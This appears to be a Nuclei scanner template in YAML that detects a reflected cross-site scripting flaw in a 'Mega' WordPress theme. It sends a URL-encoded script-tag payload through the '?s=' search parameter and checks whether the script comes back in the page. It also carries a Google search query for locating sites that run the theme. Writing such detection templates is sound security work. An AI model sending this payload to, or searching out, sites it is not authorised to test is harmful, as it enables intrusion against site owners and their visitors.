32 lines
1.0 KiB
YAML
32 lines
1.0 KiB
YAML
id: wp-mega-theme
|
|
|
|
info:
|
|
name: Mega Wordpress Theme - Cross site scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2021120027
|
|
- https://www.zhaket.com/web/megawp-wordpress-theme
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
google-query: Megawp-Theme
|
|
tags: wp,wp-theme,wordpress,xss,mega
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?s=%22%3E%3Cscript%3Ealert(`document.domain`)%3C/script%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "script>alert(`document.domain`)</script") && contains(body, "mega-theme")'
|
|
condition: and
|
|
|
|
# digest: 490a0046304402202d0f678099bcd0db5b945b5d58a745d57b13ed17cfe4671b79e2bb0aa474a14a022009c8125c5b5cd6b0189fbfe1f657f3090b8b51a72fc66c06eda99fd57f93819e:922c64590222798bb761d5b6d8e72950
|